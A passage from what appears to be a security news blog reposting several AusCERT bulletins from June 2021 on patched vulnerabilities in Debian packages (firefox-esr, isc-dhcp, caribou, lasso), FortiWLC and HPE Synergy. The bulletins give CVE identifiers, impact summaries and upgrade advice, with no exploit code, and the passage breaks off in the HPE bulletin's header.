AUSCERT External Security Bulletin Redistribution

ESB-2021.1949
firefox-esr security update
4 June 2021

===========================================================================

AusCERT Security Bulletin Summary
———————————

Product: firefox-esr
Publisher: Debian
Operating System: Debian GNU/Linux
Impact/Access: Execute Arbitrary Code/Commands — Remote with User Interaction
Denial of Service — Remote with User Interaction
Resolution: Patch/Upgrade
CVE Names: CVE-2021-29967

Reference: ESB-2021.1942
ESB-2021.1925

Original Bulletin:
http://www.debian.org/lts/security/2021/dla-2673

– ————————–BEGIN INCLUDED TEXT——————–

– —–BEGIN PGP SIGNED MESSAGE—–
Hash: SHA256

– – ————————————————————————-
Debian LTS Advisory DLA-2673-1 debian-lts@lists.debian.org
https://www.debian.org/lts/security/ Emilio Pozuelo Monfort
June 03, 2021 https://wiki.debian.org/LTS
– – ————————————————————————-

Package : firefox-esr
Version : 78.11.0esr-1~deb9u1
CVE ID : CVE-2021-29967

Multiple security issues have been found in the Mozilla Firefox
web browser, which could potentially result in the execution
of arbitrary code.

For Debian 9 stretch, this problem has been fixed in version
78.11.0esr-1~deb9u1.

We recommend that you upgrade your firefox-esr packages.

For the detailed security status of firefox-esr please refer to
its security tracker page at:
https://security-tracker.debian.org/tracker/firefox-esr

Further information about Debian LTS security advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://wiki.debian.org/LTS
– —–BEGIN PGP SIGNATURE—–

iQIzBAEBCAAdFiEEcJymx+vmJZxd92Q+nUbEiOQ2gwIFAmC4ooQACgkQnUbEiOQ2
gwISXQ/8D6iJ+Wr/UYf06QG+zTP9Omg9m/gyHm9M3mq8R73HabXi3QJiEoKVvhIU
DCQCPxUg2yalF3//BWib8ye8RdueZJdYu3DSInQhMheU6VI/jhXTzdHKuT16/NgX
HdWlb4Ph3dJUZMu5vgPVfQNCxNQree362vfqCSp3KXZ7m0YHNgpz+u9UEHgwdkiB
UqNM6tR8qCK62m1LCD1fnpfOqL9NRwJOhNHugnhS7oHacgOBsT4KZ7mYINtHbFJS
/Rv8cBthWq1Hcdg7M0cW1y919zXuzJLr8dczmhmraZvw00hkgVXDBezdbDAMH//d
EVfKKn6p7sN8zLq86QO6acY1DJUMjbJUb1TMd0dqSbwxb/3VMzlJSJuT2hQ/XnTY
GGJ7XcNQRFoL22o7cR/ejwMM/CjJSDXE9QlTGHggBKAGpPrXGfaWsvG6xbXKlAm5
erBegj19FNwOXs0D8SpgMwHc0tkFwe6RoFrr4Zd+8IL8zut0WFoYjwGTzmSVgqAP
bN4HCO4nCXAiHTJ2lSdX/f1mZE0wBGFQLCIUAhci670Gdu4uecG8trj2nyGHXCHe
/XJEVK7+FDdNIq8PaNm4SE7hjcei1RwrcoPTPdW4buOKuRLv2kE7HRUDcYkT0z4k
D72R5XxviDZ/6on+luRk3srYDI+TfD256bDpAUeRyRbsvV9ibJE=
=G9gg
– —–END PGP SIGNATURE—–

– ————————–END INCLUDED TEXT——————–

You have received this e-mail bulletin as a result of your organisation’s
registration with AusCERT. The mailing list you are subscribed to is
maintained within your organisation, so if you do not wish to continue
receiving these bulletins you should contact your local IT manager. If
you do not know who that is, please send an email to auscert@auscert.org.au
and we will forward your request to the appropriate person.

NOTE: Third Party Rights
This security bulletin is provided as a service to AusCERT’s members. As
AusCERT did not write the document quoted above, AusCERT has had no control
over its content. The decision to follow or act on information or advice
contained in this security bulletin is the responsibility of each user or
organisation, and should be considered in accordance with your organisation’s
site policies and procedures. AusCERT takes no responsibility for consequences
which may arise from following or acting on information or advice contained in
this security bulletin.

NOTE: This is only the original release of the security bulletin. It may
not be updated when updates to the original are made. If downloading at
a later date, it is recommended that the bulletin is retrieved directly
from the author’s website to ensure that the information is still current.

Contact information for the authors of the original document is included
in the Security Bulletin above. If you have any questions or need further
information, please contact them directly.

Previous advisories and external security bulletins can be retrieved from:

https://www.auscert.org.au/bulletins/

===========================================================================
Australian Computer Emergency Response Team
The University of Queensland
Brisbane
Qld 4072

Internet Email: auscert@auscert.org.au
Facsimile: (07) 3365 7031
Telephone: (07) 3365 4417 (International: +61 7 3365 4417)
AusCERT personnel answer during Queensland business hours
which are GMT+10:00 (AEST).
On call after hours for member emergencies only.
===========================================================================
—–BEGIN PGP SIGNATURE—–
Comment: http://www.auscert.org.au/render.html?it=1967

iQIVAwUBYLmpy+NLKJtyKPYoAQh/FA/+PjCfvSlJgykMh8kSn5+3Mye/l4xep95I
WURVGzahC4rAO7DqUM2k4OS3wtOdhspbMK4DnzjgJyxlvrPdTgHJZmpcBdBchl+9
mAYk6YnnlrMcYO2j9/9l2eCtuRTUdedVeObHJFRTXzrFopq1aSEViTIVsgcEHBjG
2a2hZopbxZjSak8khELxmwbemn96sSfQePZmoP43H1Lun2N5grc/8OpjbaPJ5Jld
Sy1SS29HbQFCnto8Ajzc6X2T8en1LMfsmEQ434tZsfU4KoPPYYSUs7Y3zN0ZT0xc
fPKDk8w8LUbetFGHPcQm3FBmmxy2gN9xG58v9PvpQnA7jkdmQIxj3F8fkPsnFNpr
4/4nUwGQHvRXDNHs/1mTlh3hjodGnMiOU4US+L1L1K/wU6Iw4KVzgzhq6n+HNu9o
t8t8ZW6/SfGMxlaSr1cuml2JKDDFbcKRGZrf/+YGlzwiHEhunvqfOeQha+xklPfS
ERi7SIBqUrKRaPVt/YuK8IPbjYip8FcDr29cxrE0zZySgqx0QpJ9TaIHoGxa8D4l
5s4zprlEqPqLik2KxByuTnUfAtLCkXKjdtORMjlCPlBqsJbpsW3yS4v/Ef288yF5
2bB2dwQUbMKCLkyxBbNSn5zIv+kMc3AgH3lxcWCjHqOal7sDbOGo7QCN0W5fYTSm
Mt/2W+Nmj7w=
=ZLAe
—–END PGP SIGNATURE—–

Read More

The post ESB-2021.1949 – [Debian] firefox-esr: Multiple vulnerabilities appeared first on Malware Devil.



https://malwaredevil.com/2021/06/04/esb-2021-1949-debian-firefox-esr-multiple-vulnerabilities/?utm_source=rss&utm_medium=rss&utm_campaign=esb-2021-1949-debian-firefox-esr-multiple-vulnerabilities

ESB-2021.1950 – [Debian] isc-dhcp: Denial of service – Remote/unauthenticated

—–BEGIN PGP SIGNED MESSAGE—–
Hash: SHA256

===========================================================================
AUSCERT External Security Bulletin Redistribution

ESB-2021.1950
isc-dhcp security update
4 June 2021

===========================================================================

AusCERT Security Bulletin Summary
———————————

Product: isc-dhcp
Publisher: Debian
Operating System: Debian GNU/Linux
Impact/Access: Denial of Service — Remote/Unauthenticated
Resolution: Patch/Upgrade
CVE Names: CVE-2021-25217

Reference: ESB-2021.1935
ESB-2021.1834

Original Bulletin:
http://www.debian.org/lts/security/2021/dla-2674

– ————————–BEGIN INCLUDED TEXT——————–

– —–BEGIN PGP SIGNED MESSAGE—–
Hash: SHA256

– – ————————————————————————-
Debian LTS Advisory DLA-2674-1 debian-lts@lists.debian.org
https://www.debian.org/lts/security/ Emilio Pozuelo Monfort
June 03, 2021 https://wiki.debian.org/LTS
– – ————————————————————————-

Package : isc-dhcp
Version : 4.3.5-3+deb9u2
CVE ID : CVE-2021-25217
Debian Bug : 989157

Jon Franklin and Pawel Wieczorkiewicz found an issue in the ISC DHCP
client and server when parsing lease information, which could lead to
denial of service via application crash.

For Debian 9 stretch, this problem has been fixed in version
4.3.5-3+deb9u2.

We recommend that you upgrade your isc-dhcp packages.

For the detailed security status of isc-dhcp please refer to
its security tracker page at:
https://security-tracker.debian.org/tracker/isc-dhcp

Further information about Debian LTS security advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://wiki.debian.org/LTS
– —–BEGIN PGP SIGNATURE—–

iQIzBAEBCAAdFiEEcJymx+vmJZxd92Q+nUbEiOQ2gwIFAmC4wCkACgkQnUbEiOQ2
gwLSAw/9EYyg7+uWNd5cL2IgBC2ODm3LmEjzEgbYngVg/pj9Pd72J8gzDFm/5J+M
9yXT8LQ2bt2VxG0GJ7TflSS+MuvTrM3yZGV1hqdEGS7Sdoka0bzzPTIvhwVDrboI
ujK40OrQFw3Zd3yoYU76Ax+bUQjuHZ1w47KgFD09rzS77rolZ5GKGaZw/n9gZhi1
E8m8ykKTKIwcZ1LEiSCVzqnicuHBJHrs+HfwSigRVZBSW8tM6s+4QyZcBd4DcWEv
waZj30FxHMlh1tr16GxpKud1N0ggLgbLM06QgYvLLJ2AAwj4P4VGaOP3q3BU4aGJ
n8eqv2cJluBd9JIUhTVQ2ahzK6Ftjk1angh75uh7kKUCwTbW8DZGxTnxfniWrrjL
29d7Le7ks6Xo8SJOyKdvPi5ocuN7PY/2qdZe+f1QulEHkXFU2ajNiUHkopM4QXvD
Ydk2TdGi6zRP16iRFd8lpaImb1dwGhqE7n4dKYYcE3BndJgAST5aYVvT0mO9HWVg
P1gXKAI3w3rUWObUlZqfb0UygJQfAjWBqsN6LUl2WV5HGaGDEKLDOUVKr77FMjaI
hYcXsOh2Mbxl98MH2loHM3AC0EShj96P28LryNw9y6UOlnFRrWGgYi9aTp9u4SLo
QGlqOQkKmpjE50kn1Fg/Kr4J6vxp1iGP+8P5geQJFU5s86o2DIM=
=ERkS
– —–END PGP SIGNATURE—–

– ————————–END INCLUDED TEXT——————–

You have received this e-mail bulletin as a result of your organisation’s
registration with AusCERT. The mailing list you are subscribed to is
maintained within your organisation, so if you do not wish to continue
receiving these bulletins you should contact your local IT manager. If
you do not know who that is, please send an email to auscert@auscert.org.au
and we will forward your request to the appropriate person.

NOTE: Third Party Rights
This security bulletin is provided as a service to AusCERT’s members. As
AusCERT did not write the document quoted above, AusCERT has had no control
over its content. The decision to follow or act on information or advice
contained in this security bulletin is the responsibility of each user or
organisation, and should be considered in accordance with your organisation’s
site policies and procedures. AusCERT takes no responsibility for consequences
which may arise from following or acting on information or advice contained in
this security bulletin.

NOTE: This is only the original release of the security bulletin. It may
not be updated when updates to the original are made. If downloading at
a later date, it is recommended that the bulletin is retrieved directly
from the author’s website to ensure that the information is still current.

Contact information for the authors of the original document is included
in the Security Bulletin above. If you have any questions or need further
information, please contact them directly.

Previous advisories and external security bulletins can be retrieved from:

https://www.auscert.org.au/bulletins/

===========================================================================
Australian Computer Emergency Response Team
The University of Queensland
Brisbane
Qld 4072

Internet Email: auscert@auscert.org.au
Facsimile: (07) 3365 7031
Telephone: (07) 3365 4417 (International: +61 7 3365 4417)
AusCERT personnel answer during Queensland business hours
which are GMT+10:00 (AEST).
On call after hours for member emergencies only.
===========================================================================
—–BEGIN PGP SIGNATURE—–
Comment: http://www.auscert.org.au/render.html?it=1967

iQIVAwUBYLmp2+NLKJtyKPYoAQgOGQ/9GPOATSDqYaujxtVlrVIlXLogAiM4YaEZ
Qptt4j203uayNPsyLFVfTeQfwHi6KgONQpt5Gkkj+VELcubasImM9YE1hTr4rbUm
6lIaqJ/kii5jmIQl8xAeQi3ah9/jfUiWuNDJRv6d/Dxr11GrcZxyDmufemTotvZQ
2MNHh810BS5IZsxFVHZSCmNDiFXf1GDF31K+vYgF+wal2KcLDYIhStTYK+y4HUED
LsijPH2IjYEVL9+zL98EY8t23I8bZLNv24ZJSjttOyWdlMj7AwBwvTXkfsqxHaZo
BoM82ldeK171xy/FH47czBo7bJ4W3Pm8FxldUunvK6iNvgf91kR6nUAkdqN6IuLi
fepruupRQ5hlajazDEd+pff5YogmAKGK2YjOD5t4/oSUd5MtnWVA+Anqk3Q8Da1Z
Lby1OdG0MoHli/lh+ISQC0pBK1pofwnFjp3fonM3D5B8wXAKRANDLBrM/CCbZL4s
xArCTZLMI8tnsxDqAiXCW+/CGYOKANq/PjQJFqDCxOFIUgJ5yDQvZwhmJNomIJW8
OenfxGqmMnhEKFBuhAmqoltSk5RYNiYYfRV06k+0ZQTQFZTOcHbSYAZjBHodsYcw
hH9JJRe0x1pdchiRtgvzr48JveNMuF9W9UwOVi4p0QyGTe9zakjX04wf7tyqoSkx
52QB4oDNvFY=
=OIl1
—–END PGP SIGNATURE—–

Read More

The post ESB-2021.1950 – [Debian] isc-dhcp: Denial of service – Remote/unauthenticated appeared first on Malware Devil.



https://malwaredevil.com/2021/06/04/esb-2021-1950-debian-isc-dhcp-denial-of-service-remote-unauthenticated/?utm_source=rss&utm_medium=rss&utm_campaign=esb-2021-1950-debian-isc-dhcp-denial-of-service-remote-unauthenticated

ESB-2021.1951 – [Debian] caribou: Multiple vulnerabilities

—–BEGIN PGP SIGNED MESSAGE—–
Hash: SHA256

===========================================================================
AUSCERT External Security Bulletin Redistribution

ESB-2021.1951
caribou regression update
4 June 2021

===========================================================================

AusCERT Security Bulletin Summary
———————————

Product: caribou
Publisher: Debian
Operating System: Debian GNU/Linux
Impact/Access: Increased Privileges — Existing Account
Denial of Service — Existing Account
Access Confidential Data — Existing Account
Resolution: Patch/Upgrade
CVE Names: CVE-2020-25712

Original Bulletin:
http://www.debian.org/lts/security/2021/dla-2675

– ————————–BEGIN INCLUDED TEXT——————–

– —–BEGIN PGP SIGNED MESSAGE—–
Hash: SHA256

– – ————————————————————————-
Debian LTS Advisory DLA-2675-1 debian-lts@lists.debian.org
https://www.debian.org/lts/security/ Emilio Pozuelo Monfort
June 03, 2021 https://wiki.debian.org/LTS
– – ————————————————————————-

Package : caribou
Version : 0.4.21-1+deb9u1
Debian Bug : 980061

It was found that the fix for CVE-2020-25712 in the Xorg X server, addressed
in DLA-2486-1, caused a regression in caribou, making it crash whenever
special (shifted) characters were entered.

For Debian 9 stretch, this problem has been fixed in version
0.4.21-1+deb9u1.

We recommend that you upgrade your caribou packages.

For the detailed security status of caribou please refer to
its security tracker page at:
https://security-tracker.debian.org/tracker/caribou

Further information about Debian LTS security advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://wiki.debian.org/LTS
– —–BEGIN PGP SIGNATURE—–

iQIzBAEBCAAdFiEEcJymx+vmJZxd92Q+nUbEiOQ2gwIFAmC4x2IACgkQnUbEiOQ2
gwILDhAAuVyLtsAw+iXVuY1tcExwgu/Z5nflVOIrCGKHUXEPiJ3GSUgccAIDaZ8I
uUIF+a4PIOOrKG2pjXUXQkUskKjachQODn5+eZPTvpMd39UCm9iE/uEg93VaW3SH
pXS4JKxCiGgkwPjF4u5NLLW3iHyYRM8FpfZrpYaVV1HkR7oUohakpHwEBuccidoV
afRjRMn++Jn8EzIhMmbuP6/H9haLZi6lldD42h21pW6eGnEq1cRlgX6eURRKo7PN
FJ/E/P4oyxSqQuOASjb+mHlBPushWzYN1mnOj/w/CxwknC3WXbvuV8C1YRiEHLc8
5FRI44u9RXSoIJmEdWaejD6cmHHJcd39A/DTsD+TDv5/pakTLfErnWwdbrnNluuu
wjfB+D+MX7fXE6q8OhqCNXHxdEqSBKzBRAgN3tHdhaIc1f5QXkdeTRbhhrhSFRLX
io7vaLrYc95+ZI/9LTfsX1GMzLVW+qqlGlCrZaXCBTaTYapiStuhgHJptWY+AlAg
0B4drByUs/dB30H72yn96m6k/P14KTQAsQcxQeJMky89olJ9Q9Mk/QzU9jZ2zMa0
OzxbgFzBrhhKL1uGumomh5Fh1kCgfvFDGL/dCB10LN28tdTuv27zMfACqVNqbDul
bZhUITZFtbrgSrTvUbfz3pn2XWsVNf+pJYLQmO/r4Nsvlfz0TwM=
=p48N
– —–END PGP SIGNATURE—–

– ————————–END INCLUDED TEXT——————–

You have received this e-mail bulletin as a result of your organisation’s
registration with AusCERT. The mailing list you are subscribed to is
maintained within your organisation, so if you do not wish to continue
receiving these bulletins you should contact your local IT manager. If
you do not know who that is, please send an email to auscert@auscert.org.au
and we will forward your request to the appropriate person.

NOTE: Third Party Rights
This security bulletin is provided as a service to AusCERT’s members. As
AusCERT did not write the document quoted above, AusCERT has had no control
over its content. The decision to follow or act on information or advice
contained in this security bulletin is the responsibility of each user or
organisation, and should be considered in accordance with your organisation’s
site policies and procedures. AusCERT takes no responsibility for consequences
which may arise from following or acting on information or advice contained in
this security bulletin.

NOTE: This is only the original release of the security bulletin. It may
not be updated when updates to the original are made. If downloading at
a later date, it is recommended that the bulletin is retrieved directly
from the author’s website to ensure that the information is still current.

Contact information for the authors of the original document is included
in the Security Bulletin above. If you have any questions or need further
information, please contact them directly.

Previous advisories and external security bulletins can be retrieved from:

https://www.auscert.org.au/bulletins/

===========================================================================
Australian Computer Emergency Response Team
The University of Queensland
Brisbane
Qld 4072

Internet Email: auscert@auscert.org.au
Facsimile: (07) 3365 7031
Telephone: (07) 3365 4417 (International: +61 7 3365 4417)
AusCERT personnel answer during Queensland business hours
which are GMT+10:00 (AEST).
On call after hours for member emergencies only.
===========================================================================
—–BEGIN PGP SIGNATURE—–
Comment: http://www.auscert.org.au/render.html?it=1967

iQIVAwUBYLmqVeNLKJtyKPYoAQiGyA/7BdklC0qTuV8oVsh+FoOWwrTThHPY6yay
cpJ6fCoM60WMcX/EXPsVHHO6lXYY94aC8D3UCLN6zixuKKDbw70LUzvZ7bZEzetz
Q8ZDQyPvi3CCDUq28Wd2afb4sj5Yho+kPmz/sc9+7kPJkEIarXz3TF4YqP++5qpC
hAqEToaYwOU8nF1C65KW/d7amASV91P++RzQmeYNEOPXSq3IDXDp1KLR36Ia/wIm
FWPxivONLKrlAj4o/ZuEH2WV2G945iyuUvxdzTJhzXg8In9CvmWJFd8oVAhfcs1h
6g48LIrL3+1lce1YqMnruC2a1uzYH9PLvs2da5EObkz9SZBu3ofEnUG4pCV0Axr5
+XCRZE0eE8ti9tMjY8tqDc48gD/3g6oKrD1zB6hIDhlM27vKBwpSfVYIiUcGXViH
twiRDiMRbuwaDeC53kFpx0j/QZpKlGtDRXb3DhM8LLSF0Claiioud+6txHQnWvEg
++R0JrDRmSOllWO0xOf+17euMS268X9w6f4I80zo26OSoye9Kbvozo8caC0bQ/fu
O8mZZFKfZgauqIn4FM78hr7S3GudaVC0cYKRntsON2vRq12/6RWO065qhBlzKbF5
124ic7xLocQ5IyxZ1HxT5i4XsZHxwHhTRgjLAQ2BNp7YK9Xbkw/WKELmdujGy36h
9z3EYMxcfj4=
=kYgS
—–END PGP SIGNATURE—–

Read More

The post ESB-2021.1951 – [Debian] caribou: Multiple vulnerabilities appeared first on Malware Devil.



https://malwaredevil.com/2021/06/04/esb-2021-1951-debian-caribou-multiple-vulnerabilities/?utm_source=rss&utm_medium=rss&utm_campaign=esb-2021-1951-debian-caribou-multiple-vulnerabilities

ESB-2021.1952 – [Debian] lasso: Multiple vulnerabilities

—–BEGIN PGP SIGNED MESSAGE—–
Hash: SHA256

===========================================================================
AUSCERT External Security Bulletin Redistribution

ESB-2021.1952
lasso security update
4 June 2021

===========================================================================

AusCERT Security Bulletin Summary
———————————

Product: lasso
Publisher: Debian
Operating System: Debian GNU/Linux
Impact/Access: Provide Misleading Information — Existing Account
Unauthorised Access — Existing Account
Reduced Security — Existing Account
Resolution: Patch/Upgrade
CVE Names: CVE-2021-28091

Reference: ESB-2021.1902
ESB-2021.1895

Original Bulletin:
https://lists.debian.org/debian-security-announce/2021/msg00109.html

– ————————–BEGIN INCLUDED TEXT——————–

– —–BEGIN PGP SIGNED MESSAGE—–
Hash: SHA512

– – ————————————————————————-
Debian Security Advisory DSA-4926-1 security@debian.org
https://www.debian.org/security/ Salvatore Bonaccorso
June 03, 2021 https://www.debian.org/security/faq
– – ————————————————————————-

Package : lasso
CVE ID : CVE-2021-28091

It was discovered that lasso, a library which implements SAML 2.0 and
Liberty Alliance standards, did not properly verify that all assertions
in a SAML response were properly signed, allowing an attacker to
impersonate users or bypass access control.

For the stable distribution (buster), this problem has been fixed in
version 2.6.0-2+deb10u1.

We recommend that you upgrade your lasso packages.

For the detailed security status of lasso please refer to its security
tracker page at:
https://security-tracker.debian.org/tracker/lasso

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org
– —–BEGIN PGP SIGNATURE—–

iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmC5OelfFIAAAAAALgAo
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2
NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND
z0SMlBAAlqfhxRtbtCwH9QXebMP3WTj8zqaQPtk6/633T2FPDeiEYk+AXsc/NmyT
PjhBGiSneqsKfZb/4Twr7Q4xnCKpp4hXz9mOf1ZhCXdewMNgLub8TVwuc0oqRWfv
uIG7cFnlGdLQ43EaTqsGPUoezAZZvh3r5LLkfz5N6y6OcNniGPoqIW3J0EZs8CyR
XuXHdETrYqSbGCirQUDFM5FXossNSwlEphzdSbgYNNy8blGnL6R9nS+lBnHmcPE5
SdAO9oZDR3xctY+VyeJOVbsJ/JHgiKdHYdZ7iNG5DDHSzuf0051XmAY/psfkTf6+
wED+bbN8BF/OgsFKFjO7qqxgBTITuZaWJstZFoFEUwT0L5KCSZT8BXkvUEJdt+Se
OHDJ/+zxktoGAVZZ2Mr+QGt6aza+r95865KaVkK42sIIefSQ4sG4Dpln8748tMIF
g+fQvF+l3vxli/0zUQ8doRE6/b975dNwg360DImZMU+KahOtY9SD271Ek2tJ/IV7
RXG0oexfq2h37WJn4ZVZYiCHdW3XaBw9LDvqaD42m5Tgw1bBwt/lvaW6tBPhU74Q
q4t+cCKHftdoBM0HQmYtgE5auVLKKhgKijwW4Jm93WLcaXHKPrhkfvLFIuBCCx14
3ZekMRTYASkoRVzL4LesIppfRSGzxRd3MqKkcs29rkoQdJaJtbg=
=Yhdx
– —–END PGP SIGNATURE—–

– ————————–END INCLUDED TEXT——————–

You have received this e-mail bulletin as a result of your organisation’s
registration with AusCERT. The mailing list you are subscribed to is
maintained within your organisation, so if you do not wish to continue
receiving these bulletins you should contact your local IT manager. If
you do not know who that is, please send an email to auscert@auscert.org.au
and we will forward your request to the appropriate person.

NOTE: Third Party Rights
This security bulletin is provided as a service to AusCERT’s members. As
AusCERT did not write the document quoted above, AusCERT has had no control
over its content. The decision to follow or act on information or advice
contained in this security bulletin is the responsibility of each user or
organisation, and should be considered in accordance with your organisation’s
site policies and procedures. AusCERT takes no responsibility for consequences
which may arise from following or acting on information or advice contained in
this security bulletin.

NOTE: This is only the original release of the security bulletin. It may
not be updated when updates to the original are made. If downloading at
a later date, it is recommended that the bulletin is retrieved directly
from the author’s website to ensure that the information is still current.

Contact information for the authors of the original document is included
in the Security Bulletin above. If you have any questions or need further
information, please contact them directly.

Previous advisories and external security bulletins can be retrieved from:

https://www.auscert.org.au/bulletins/

===========================================================================
Australian Computer Emergency Response Team
The University of Queensland
Brisbane
Qld 4072

Internet Email: auscert@auscert.org.au
Facsimile: (07) 3365 7031
Telephone: (07) 3365 4417 (International: +61 7 3365 4417)
AusCERT personnel answer during Queensland business hours
which are GMT+10:00 (AEST).
On call after hours for member emergencies only.
===========================================================================
—–BEGIN PGP SIGNATURE—–
Comment: http://www.auscert.org.au/render.html?it=1967

iQIVAwUBYLmqZ+NLKJtyKPYoAQjoUQ/+Ns+QgdAqt96aDW1k/oTmFkg/fycpAXGc
2VHCmZGUmsz2CG1RGQTfy0tH9mvRNZ+oDYY9smXkaSay5ZpAtkTMTO/kD3DCc0Zd
hdWvW4/coZqAgAeNzD4OGeeFzlOkq5e2lGX5giVcTiv5SE77g1/oAkdj+lK/UPXx
QRhBMBNTrw/uTm4FDS+/jybobhuvJomD61Y1rMPqwHqUP9PODg1PLIalBLniMoEg
uUY4DtoKy0A0iF7A/cJq5lc0snYB0A3+MhAYkIpQTE4MFYzMr7I+nmj271zUd5dv
ahojln+AY3U2TZXYs5aUGsXX/o4VBHeaCndgm2j3FZT1PNKYWU3OqqSBSIDBrsXA
Q1N99gmpQKU8sH+iIdwMABWFs89jDg4ZAtysrVvw9gh226jXOsN61hhKdAac5AcM
sEcYqE+1u/mlM0MrE7urkdMEsunDYSliHfYQxx1jhb8I7PyV7g+1KTnKDVWsw+Zo
N3cyoMOlbT9MrOsG1kSOF9som/n+AJCB5eLRI1y1DFxLzfBddIvh8aSog3R6J9Fw
WBOTROXuvZ8e8VjNR/XQEqAauOSHPrKm8DCb+e2Wibg9ofKLsfsDd/o5ctbyYauF
BNhQrveV8e2lSTCPmO4bxgnkxYchiIaKm6HeP8ySHffJAS4eaVJprNbZx6+xPYrC
aV2988bUIJ8=
=NP0B
—–END PGP SIGNATURE—–

Read More

The post ESB-2021.1952 – [Debian] lasso: Multiple vulnerabilities appeared first on Malware Devil.



https://malwaredevil.com/2021/06/04/esb-2021-1952-debian-lasso-multiple-vulnerabilities/?utm_source=rss&utm_medium=rss&utm_campaign=esb-2021-1952-debian-lasso-multiple-vulnerabilities

ESB-2021.1953 – [Appliance] FortiWLC: Multiple vulnerabilities

—–BEGIN PGP SIGNED MESSAGE—–
Hash: SHA256

===========================================================================
AUSCERT External Security Bulletin Redistribution

ESB-2021.1953
FortiWLC – Improper access control
4 June 2021

===========================================================================

AusCERT Security Bulletin Summary
———————————

Product: FortiWLC
Publisher: FortiGuard Labs
Operating System: Network Appliance
Impact/Access: Access Confidential Data — Remote/Unauthenticated
Unauthorised Access — Remote/Unauthenticated
Resolution: Patch/Upgrade
CVE Names: CVE-2021-32584

Original Bulletin:
https://fortiguard.com/psirt/FG-IR-20-138

– ————————–BEGIN INCLUDED TEXT——————–

FortiWLC – Improper access control

IR Number : FG-IR-20-138
Date : Jun 03, 2021
Risk : 3/5
CVSSv3 Score : 4.8
Impact : Improper access control, Information disclosure
CVE ID : CVE-2021-32584

Summary

An improper access control (CWE-284) vulnerability in FortiWLC may allow an
unauthenticated and remote attacker to access certain areas of the web
management CGI functionality by just specifying the correct URL. The
vulnerability applies only to limited CGI resources and might allow the
unauthorized party to access configuration details.

Impact

Improper access control, Information disclosure

Affected Products

FortiWLC versions 8.5.3 and below. FortiWLC versions 8.6.0 and below.

Solutions

Please upgrade to FortiWLC version 8.5.4 or above.
Please upgrade to FortiWLC version 8.6.1 or above.

Acknowledgement

Fortinet is pleased to thank the customer who reported this vulnerability under
responsible disclosure.

– ————————–END INCLUDED TEXT——————–

You have received this e-mail bulletin as a result of your organisation’s
registration with AusCERT. The mailing list you are subscribed to is
maintained within your organisation, so if you do not wish to continue
receiving these bulletins you should contact your local IT manager. If
you do not know who that is, please send an email to auscert@auscert.org.au
and we will forward your request to the appropriate person.

NOTE: Third Party Rights
This security bulletin is provided as a service to AusCERT’s members. As
AusCERT did not write the document quoted above, AusCERT has had no control
over its content. The decision to follow or act on information or advice
contained in this security bulletin is the responsibility of each user or
organisation, and should be considered in accordance with your organisation’s
site policies and procedures. AusCERT takes no responsibility for consequences
which may arise from following or acting on information or advice contained in
this security bulletin.

NOTE: This is only the original release of the security bulletin. It may
not be updated when updates to the original are made. If downloading at
a later date, it is recommended that the bulletin is retrieved directly
from the author’s website to ensure that the information is still current.

Contact information for the authors of the original document is included
in the Security Bulletin above. If you have any questions or need further
information, please contact them directly.

Previous advisories and external security bulletins can be retrieved from:

https://www.auscert.org.au/bulletins/

===========================================================================
Australian Computer Emergency Response Team
The University of Queensland
Brisbane
Qld 4072

Internet Email: auscert@auscert.org.au
Facsimile: (07) 3365 7031
Telephone: (07) 3365 4417 (International: +61 7 3365 4417)
AusCERT personnel answer during Queensland business hours
which are GMT+10:00 (AEST).
On call after hours for member emergencies only.
===========================================================================
—–BEGIN PGP SIGNATURE—–
Comment: http://www.auscert.org.au/render.html?it=1967

iQIVAwUBYLmrDeNLKJtyKPYoAQj3FA//TT6jwsPqj3332rZxLmhMmlbzF/NtdvXY
i9Q+LhWUhSKmmcJojSuA1MCD9O1Uzu0Itc7zdnS94gu3eENwE04zghWufoioifYE
/pPUDVbv1tuWM2kPyiFoTZEGCiSnZxmCdYZhoFiHorWvzk4LMm4pnapRhtXc9X+o
2mRddYw/8NT/0S394l/IT5VKL90kCNLuT1Jvpqa/Karr4jgkRA2eemFWCL1GBxVW
8ZNjn2hLbBzprgzE9JmXIqCvUo+Ao8BNi3aksQXF6OTNqQsq3CjsI8fLQztaB7ka
zf0ZjLpSMmRuU+zrTMiQ4u48XEh4n9bn6/pWMJfmvHDo//SLrkFQblYHRf5qYITy
kaMTfypVOispr2UYp/v7VD1L5qWQ4Vk+j7cH8lFWSZjS1JOGJAFOa1IicO/dpirV
mBl1w1WJ97hftZeniOXTIHdWgq40I+9kalJPXHWhXdFDOYqeYBDYXwR8bjKqjXZA
EijVAdi5hZyU02gUwBCz3uGJmBBCXulEMR1IXNt23UlZpWSV/CTjvT1Br/9tt4YF
thYpqN7MY01aW/vmv7DiuEVOqfzXsL3XO5KzRbOmyxnFB4UWw7x4KwXxGVf5J0CR
XwXjR4GrhSWjU6X8onidStmZvuagjZrhNMXZEiLzx38kflO1TQQSFfYHFEwm9GnA
aV08k0EM1Sw=
=XCX/
—–END PGP SIGNATURE—–

Read More

The post ESB-2021.1953 – [Appliance] FortiWLC: Multiple vulnerabilities appeared first on Malware Devil.



https://malwaredevil.com/2021/06/04/esb-2021-1953-appliance-fortiwlc-multiple-vulnerabilities/?utm_source=rss&utm_medium=rss&utm_campaign=esb-2021-1953-appliance-fortiwlc-multiple-vulnerabilities

ESB-2021.1954 – [Appliance] HPE Synergy: Multiple vulnerabilities

—–BEGIN PGP SIGNED MESSAGE—–
Hash: SHA256

===========================================================================
AUSCERT External Security Bulletin Redistribution

ESB-2021.1954
HPE Synergy Systems with Integrated Lights-Out 4 & 5 (iLO 4
& 5) Multiple Vulnerabilities
4 June 2021

===========================================================================

AusCERT Security Bulletin Summary
———————————

Product: HPE Synergy
Publisher: Hewlett-Packard
Operating System: Network Appliance
Impact/Access: Execute Arbitrary Code/Commands — Existing Account
Cross-site Scripting — Existing Account
Denial of Service — Existing Account
Access Confidential Data — Existing Account
Reduced Security — Existing Account
Resolution: Patch/Upgrade
